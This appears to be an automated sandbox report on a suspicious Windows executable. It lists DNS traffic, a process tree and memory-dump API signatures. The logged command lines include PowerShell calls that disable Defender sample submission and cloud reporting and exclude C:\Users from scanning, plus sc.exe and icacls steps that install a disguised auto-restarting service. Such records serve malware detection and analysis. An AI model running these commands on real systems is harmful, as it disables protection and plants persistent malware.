                                  Sep 25, 2024 01:11:13.491370916 CEST11224970094.156.68.124192.168.2.7
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Sep 25, 2024 01:11:10.079562902 CEST | 192.168.2.7 | 1.1.1.1 | 0xbea7 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false

                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Sep 25, 2024 01:11:10.086438894 CEST | 1.1.1.1 | 192.168.2.7 | 0xbea7 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false

                                  Target ID:0
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\SgrmBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                  Imagebase:0x7ff7c1040000
                                  File size:329'504 bytes
                                  MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:2
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:4
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:6
                                  Start time:19:11:05
                                  Start date:24/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x400000
                                  File size:11'950'592 bytes
                                  MD5 hash:07FC5B4F3A432B09B0D51F8B00EF05F3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:8
                                  Start time:19:11:05
                                  Start date:24/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Desktop\file.exe
                                  Imagebase:0x400000
                                  File size:11'950'592 bytes
                                  MD5 hash:07FC5B4F3A432B09B0D51F8B00EF05F3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:false

                                  Target ID:9
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
                                  Imagebase:0x7ff6f2900000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:19:11:09
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:13
                                  Start time:19:11:09
                                  Start date:24/09/2024
                                  Path:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe"
                                  Imagebase:0x7ff7e3ce0000
                                  File size:98'304 bytes
                                  MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 3%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:15
                                  Start time:19:11:12
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:19:11:14
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:19:11:21
                                  Start date:24/09/2024
                                  Path:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe"
                                  Imagebase:0x7ff70bd10000
                                  File size:10'639'360 bytes
                                  MD5 hash:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 19%, ReversingLabs
                                  Has exited:true

                                  Target ID:19
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\taskkill.exe
                                  Wow64 process (32bit):false
                                  Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                  Imagebase:0x7ff6df2a0000
                                  File size:101'376 bytes
                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe stop RDP-Controller
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:22
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe start RDP-Controller
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:28
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Imagebase:0x7ff7aabd0000
                                  File size:89'088 bytes
                                  MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 11%, ReversingLabs
                                  Has exited:true

                                  Target ID:30
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\icacls.exe
                                  Wow64 process (32bit):false
                                  Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                  Imagebase:0x7ff749be0000
                                  File size:39'424 bytes
                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\icacls.exe
                                  Wow64 process (32bit):false
                                  Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
                                  Imagebase:0x7ff749be0000
                                  File size:39'424 bytes
                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:20:30:49
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:35
                                  Start time:20:31:06
                                  Start date:24/09/2024
                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                  Imagebase:0x7ff7063a0000
                                  File size:468'120 bytes
                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:36
                                  Start time:20:31:06
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:20:31:16
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:38
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
                                  Imagebase:0x7ff6ea010000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
                                  Imagebase:0x7ff6ea010000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:41
                                  Start time:20:31:49
                                  Start date:24/09/2024
                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Imagebase:0x7ff7aabd0000
                                  File size:89'088 bytes
                                  MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA05F
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA065
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA06B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 3668304517-0
                                    • Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                    • Instruction ID: f01132f22e98093e879990006570dc18aca1f78398c9d62774f24d1f293e41e0
                                    • Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                    • Instruction Fuzzy Hash: B2B15D35928B8C8FDB54EF28C884A9AB7E1FFA8310F50571EE84AD7255DB70D481CB81
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CD0F7
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CD0FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 3668304517-0
                                    • Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                    • Instruction ID: b8aa88481214b34ca363a55c2bef5469f45356665e809bc6cb2f85253a10fde6
                                    • Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                    • Instruction Fuzzy Hash: DCA16C35938B8C8BDB54EF2CD8856EAB7E1FB98350F10572EE88AC7154DB709581CB81
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _clrfp
                                    • String ID:
                                    • API String ID: 3618594692-0
                                    • Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                    • Instruction ID: c41a7211af1dec433722488d94921d1e60cb790fcb573152d3204f383b308f66
                                    • Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                    • Instruction Fuzzy Hash: A6B15A30520A4E8FDB99DF1CC88AB56B7E0FF59314F198599E859CB262C335E892CF01
                                    APIs
                                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 032D0DCF
                                      • Part of subcall function 032D3132: __GetUnwindTryBlock.LIBCMT ref: 032D3175
                                      • Part of subcall function 032D3132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 032D319A
                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 032D0EA7
                                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 032D10F5
                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 032D1202
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 849930591-393685449
                                    • Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                    • Instruction ID: a1b197e950e9a69f3d5579c9d13016eaa9f49f144cc7cfcfc853517fedb2626f
                                    • Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                    • Instruction Fuzzy Hash: 0EE1F430938B498FDB54EF6CC4856A9B7E1FB99310F14425ED889CB661DB70E4D1CB82
                                    APIs
                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 032D13E0
                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 032D1709
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 3523768491-393685449
                                    • Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                    • Instruction ID: 0dbd1091a68803dcff920d8702161e1d3b4d9b6d75261add4384cdf442a2c70d
                                    • Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                    • Instruction Fuzzy Hash: 91E11734438B498FCB54EF28C4846AAB7E1FF59310F14466DD486CBA62DB70E4D2CB82
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                    • Instruction ID: d1b72f817b3d836422b1e0e8486db38909ede09f94955550fca6a4c133dff7b9
                                    • Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                    • Instruction Fuzzy Hash: C6C1E430138F4B8FDB29EB689054675B2E1FB99710F68C66DD486C7165EAB0D8C1C7C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $($2$H$P!`$`
                                    • API String ID: 0-2682688576
                                    • Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                    • Instruction ID: 7b95148ab3caafcfcdfd234bc62fd11318c4d3f06adbd384d8e5ca4abebe78b2
                                    • Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                    • Instruction Fuzzy Hash: 8FC105B0918B888FD7A4DF18C08879ABBE0FB99704F504A6ED8CDCB215DB705589CF46
                                    APIs
                                    • _CallSETranslator.LIBVCRUNTIME ref: 032D1A71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CallTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3163161869-2084237596
                                    • Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                    • Instruction ID: d65d2ca03d5ec7d9d5f810452d2cbed7aa459c3a8658b78b76f888eabab09618
                                    • Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                    • Instruction Fuzzy Hash: 9FA1B430928B488FCB59EF6CD885AA9BBF0FB98314F14465EE449C7111EB74E581CB82
                                    APIs
                                    • __except_validate_context_record.LIBVCRUNTIME ref: 032D00A5
                                    • _IsNonwritableInCurrentImage.LIBCMT ref: 032D013C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 3242871069-1018135373
                                    • Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                    • Instruction ID: 76515b14964c2cc3b5909f3e380c4bbd1d8480b77db88ee54e7f269c2b706a92
                                    • Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                    • Instruction Fuzzy Hash: BD61E73072DA098BCF28EE5CD489A7973D5FB54350F14816DE886C7266EA70ECD18B85
                                    APIs
                                    • _CallSETranslator.LIBVCRUNTIME ref: 032D17F1
                                    Strings
                                    Memory Dump Source
